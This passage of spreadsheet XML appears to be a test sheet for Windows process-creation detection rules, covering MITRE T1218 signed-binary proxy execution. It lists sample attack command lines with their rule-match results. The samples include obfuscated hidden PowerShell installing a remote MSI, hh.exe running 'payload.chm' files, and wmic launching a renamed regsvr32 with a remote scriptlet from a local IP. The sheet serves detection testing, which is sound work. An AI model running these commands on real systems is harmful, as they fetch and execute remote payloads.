          <t>powershell.exe -WIndoWStYle Hidden -c "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F3256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3256" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3256" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3256" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J3256" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3256" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3257" ht="15.75" customHeight="1" s="42">
      <c r="A3257" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3257" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3257" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3257" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3257" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -wInDowsTyLe Hidden -COmMANd "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F3257" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3257" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3257" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3257" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J3257" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3257" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3258" ht="15.75" customHeight="1" s="42">
      <c r="A3258" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3258" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3258" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3258" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3258" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -WInDowSTYLE Hidden -cOmmaND "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F3258" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3258" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3258" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3258" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J3258" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3258" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3259" ht="15.75" customHeight="1" s="42">
      <c r="A3259" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3259" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3259" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3259" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3259" s="4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3259" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3259" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3259" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3259" s="43" t="n"/>
      <c r="J3259" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3259" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3260" ht="15.75" customHeight="1" s="42">
      <c r="A3260" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3260" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3260" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3260" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3260" s="44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3260" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3260" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3260" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3260" s="43" t="n"/>
      <c r="J3260" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3260" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3261" ht="15.75" customHeight="1" s="42">
      <c r="A3261" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B3261" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C3261" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D3261" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E3261" s="44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3261" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3261" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3261" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3261" s="43" t="n"/>
      <c r="J3261" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3261" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3262" ht="15.75" customHeight="1" s="42">
      <c r="A3262" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3262" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3262" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3262" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3262" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F3262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3262" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3262" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3262" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3262" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3262" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3263" ht="15.75" customHeight="1" s="42">
      <c r="A3263" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3263" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3263" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3263" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3263" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F3263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3263" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3263" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3263" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3263" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3263" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3264" ht="15.75" customHeight="1" s="42">
      <c r="A3264" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3264" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3264" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3264" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3264" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F3264" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3264" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3264" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3264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64" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3264" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3265" ht="15.75" customHeight="1" s="42">
      <c r="A3265" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3265" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3265" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3265" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3265" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F3265" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3265" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3265" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3265" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3265" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3265" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3266" ht="15.75" customHeight="1" s="42">
      <c r="A3266" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3266" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3266" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3266" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3266" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F3266" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3266" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3266" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3266" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3266" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3266" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3267" ht="15.75" customHeight="1" s="42">
      <c r="A3267" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3267" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3267" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3267" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3267" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3267" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3267" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3267" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3267" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3267" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3268" ht="15.75" customHeight="1" s="42">
      <c r="A3268" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3268" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3268" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3268" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3268" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3268" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3268" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3268" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3268" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3268" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3268" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3269" ht="15.75" customHeight="1" s="42">
      <c r="A3269" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3269" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3269" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3269" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3269" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3269" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3269" s="44" t="n"/>
      <c r="J3269" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3269" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3270" ht="15.75" customHeight="1" s="42">
      <c r="A3270" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3270" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3270" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3270" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3270" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3270" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3270" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3270" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3270" s="44" t="n"/>
      <c r="J3270" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3270" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3271" ht="15.75" customHeight="1" s="42">
      <c r="A3271" s="44" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3271" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3271" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3271" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3271" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F3271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3271" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3271" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3271" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3271" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3271" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3272" ht="15.75" customHeight="1" s="42">
      <c r="A3272" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3272" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3272" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3272" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3272" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F3272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3272" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3272" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3272" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3272" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3272" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3273" ht="15.75" customHeight="1" s="42">
      <c r="A3273" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3273" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3273" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3273" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3273" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F3273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3273" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3273" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3273" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3273" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3273" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3274" ht="15.75" customHeight="1" s="42">
      <c r="A3274" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B3274" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3274" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3274" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3274" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F3274" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3274" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3274" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3274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74" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3274" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3275" ht="15.75" customHeight="1" s="42">
      <c r="A3275" s="43" t="n"/>
      <c r="B3275" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C3275" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D3275" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E3275" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F3275" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3275" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3275" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3275" s="44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3275" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3275" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3276" ht="15.75" customHeight="1" s="42">
      <c r="A3276" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3276" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3276" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3276" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3276" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F3276" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3276" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3276" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3276" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3276" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3276" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3277" ht="15.75" customHeight="1" s="42">
      <c r="A3277" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3277" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3277" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3277" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3277" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F3277" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3277" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3277" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3277" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3277" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3277" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3278" ht="15.75" customHeight="1" s="42">
      <c r="A3278" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3278" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3278" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3278" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3278" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F3278" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3278" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3278" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3278" s="44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78" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3278" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3279" ht="15.75" customHeight="1" s="42">
      <c r="A3279" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3279" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3279" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3279" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3279" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F3279" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3279" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3279" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3279" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3279" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3279" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3280" ht="15.75" customHeight="1" s="42">
      <c r="A3280" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3280" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3280" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3280" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3280" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F3280" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3280" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3280" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3280" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3280" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3280" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3281" ht="15.75" customHeight="1" s="42">
      <c r="A3281" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3281" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3281" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3281" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3281" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3281" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3281" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3281" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3281" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3281" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3281" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3282" ht="15.75" customHeight="1" s="42">
      <c r="A3282" s="44" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3282" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3282" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3282" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3282" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3282" s="44" t="b">
        <v>1</v>
